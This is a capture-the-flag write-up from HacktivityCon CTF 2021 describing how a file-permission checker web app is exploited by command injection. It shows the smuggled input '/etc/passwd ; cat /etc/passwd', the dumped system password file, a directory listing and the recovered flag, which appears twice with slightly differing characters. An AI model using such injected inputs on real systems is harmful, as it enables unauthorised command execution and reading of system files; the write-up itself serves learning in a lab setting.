This application included an input field. Enter a file name and the access control settings would appear. I tried /etc/passwd as sample input.

The challenge application checking access for the file /etc/passwd. The output is in the style of the bash command "ls -l".

From the output, this looks like the result from the ls -l command in bash.

As this is running shell commands, we can use cat to output the flag. But first, we need to know where the flag is and a way to run a cat command (this application currently only runs the ls command).

I tried the input /etc/passwd ; cat /etc/passwd to check if this would display the file permissions + the contents of /etc/passwd, and it did!

-rw-r--r-- 1 root root 1016 Sep 9 19:35 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/noloain
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
...

Now that we know this works, time to find the flag. I typed ls to check if there was anything in the current directory, and I found the flag!

-rw-r--r-- 1 root root 1016 Sep 9 19:35 /etc/passwd
flag.txt
main.py
requirements.txt
templates

All that was left to do is add the command cat flag.txt and its done!

-rw-r--r-- 1 root root 1016 Sep 9 19:35 /etc/passwd
flag{e56abbce7b83d62dac05e59fble81c68}

Flag: flag{e56abbce7b83d62dac05e59fb1e81c68}

More writeups from HacktivityCon CTF 2021

2EZ

N1TP

Butter Overflow

Swaggy

Tsunami

ToDo